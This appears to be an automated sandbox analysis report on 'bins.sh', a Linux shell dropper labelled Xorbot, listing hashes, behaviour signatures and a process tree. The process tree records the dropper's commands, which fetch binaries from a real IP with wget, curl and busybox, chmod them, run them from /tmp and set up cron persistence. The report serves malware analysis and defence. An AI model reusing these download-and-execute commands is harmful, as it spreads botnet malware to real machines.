Analysis
-
max time kernel
149s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
12/12/2024, 00:41
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
8e91a79fc4643d1043539fbf479773de
-
SHA1
c263691d4c03a21a2ecd42e3851c01f7e63f96a4
-
SHA256
25bff07e80ec30f4adc57ac056e6853ad4e01fe0e565c546d9798e20ca112640
-
SHA512
18fe143818c303acba1c37d4da2df6de7eb87c7be51ed023251d3fc88ed085a47e3e38f062ceafa26614e197718b76f2c6e682095ca9dcf25b2b520205a1d44a
-
SSDEEP
192:/jCQURJoMZ4QBGb7/uTjDsoMZ4Qvn7/uTjiQUH:/jCQURJoMZ4QBGb7/uTjIoMZ4QP7/uTi
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot behavioral1/files/fstream-3.dat family_xorbot behavioral1/files/fstream-5.dat family_xorbot behavioral1/files/fstream-7.dat family_xorbot behavioral1/files/fstream-9.dat family_xorbot -
Xorbot family
-
Contacts a large (2005) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1514 chmod 1521 chmod 1528 chmod 1535 chmod 1507 chmod -
Executes dropped EXE 5 IoCs
ioc pid Process /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX 1508 woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9 1515 ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9 /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U 1522 zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv 1529 a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2 1536 E16KuOPcUiplct7MpSkszujHELGuWSszA2 -
Renames itself 1 IoCs
pid Process 1537 E16KuOPcUiplct7MpSkszujHELGuWSszA2 -
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 Destination IP 60.233.68.108 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.40Luav crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/962/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1693/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1746/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/16/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1648/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1680/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1689/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1800/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1609/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1716/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1258/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/602/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/676/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/460/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/546/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1051/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1102/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1600/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1657/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1734/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/249/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1595/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1653/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1681/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1730/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/171/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1767/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1780/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1787/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1798/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1602/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/17/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1606/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/10/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/168/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1588/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/13/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1608/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1717/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/23/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1559/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1311/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1587/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/36/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1554/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1715/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/572/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1785/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/476/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1142/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1582/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/640/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1567/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1583/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1752/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1561/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1174/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1542/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1605/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1644/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1765/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1113/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/173/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 File opened for reading /proc/1613/cmdline E16KuOPcUiplct7MpSkszujHELGuWSszA2 -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1533 curl 1534 busybox 1536 E16KuOPcUiplct7MpSkszujHELGuWSszA2 1543 rm 1532 wget -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9 busybox File opened for modification /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U curl File opened for modification /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv busybox File opened for modification /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2 busybox File opened for modification /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX busybox File opened for modification /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U wget File opened for modification /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv wget File opened for modification /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX curl File opened for modification /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9 curl File opened for modification /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX wget File opened for modification /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U busybox File opened for modification /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv curl File opened for modification /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2 wget File opened for modification /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2 curl File opened for modification /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1498
-
/bin/rm/bin/rm bins.sh2⤵PID:1499
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX2⤵
- Writes file to tmp directory
PID:1500
-
-
/usr/bin/curlcurl -O http://216.126.231.164/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX2⤵
- Writes file to tmp directory
PID:1504
-
-
/bin/busybox/bin/busybox wget http://216.126.231.164/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX2⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/chmodchmod 777 woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX./woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX2⤵
- Executes dropped EXE
PID:1508
-
-
/bin/rmrm woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX2⤵PID:1510
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z92⤵
- Writes file to tmp directory
PID:1511
-
-
/usr/bin/curlcurl -O http://216.126.231.164/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z92⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/busybox/bin/busybox wget http://216.126.231.164/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z92⤵
- Writes file to tmp directory
PID:1513
-
-
/bin/chmodchmod 777 ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z92⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9./ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z92⤵
- Executes dropped EXE
PID:1515
-
-
/bin/rmrm ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z92⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U2⤵
- Writes file to tmp directory
PID:1518
-
-
/usr/bin/curlcurl -O http://216.126.231.164/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://216.126.231.164/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod 777 zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U./zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U2⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U2⤵PID:1524
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv2⤵
- Writes file to tmp directory
PID:1525
-
-
/usr/bin/curlcurl -O http://216.126.231.164/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://216.126.231.164/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/chmodchmod 777 a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv./a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv2⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv2⤵PID:1531
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA22⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1532
-
-
/usr/bin/curlcurl -O http://216.126.231.164/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA22⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.164/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA22⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1534
-
-
/bin/chmodchmod 777 E16KuOPcUiplct7MpSkszujHELGuWSszA22⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2./E16KuOPcUiplct7MpSkszujHELGuWSszA22⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
- System Network Configuration Discovery
PID:1536 -
/bin/shsh -c "crontab -l"3⤵PID:1538
-
/usr/bin/crontabcrontab -l4⤵PID:1539
-
-
-
/bin/shsh -c "crontab -"3⤵PID:1540
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1541
-
-
-
-
/bin/rmrm E16KuOPcUiplct7MpSkszujHELGuWSszA22⤵
- System Network Configuration Discovery
PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.164/bins/wBQq9SauqB5qBpNrsdtctSpVqNxtXMP5nT2⤵PID:1546
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
119KB
MD51b166b95f9cb4b079ef1b9ec8363ddf3
SHA10d8eb08add467b3b5474f9b25909297fe7c2839c
SHA25694a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9
SHA512983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
210B
MD53f9a908792125ae6967804780fc720c8
SHA13232dba3d08ceffb1566165fbff4c133bda968c9
SHA25604f43cfd42b9f908f59d03cad37a7242d5fe7671790e276ab0d006ec5d8e5e45
SHA512251dd565229e96788d451b62446df95e2838155f2080ab94348024e83f16f1281638ad66e74c651e3b0090aa5d38c7bba5fce979cc077a8bbd4714975c849c79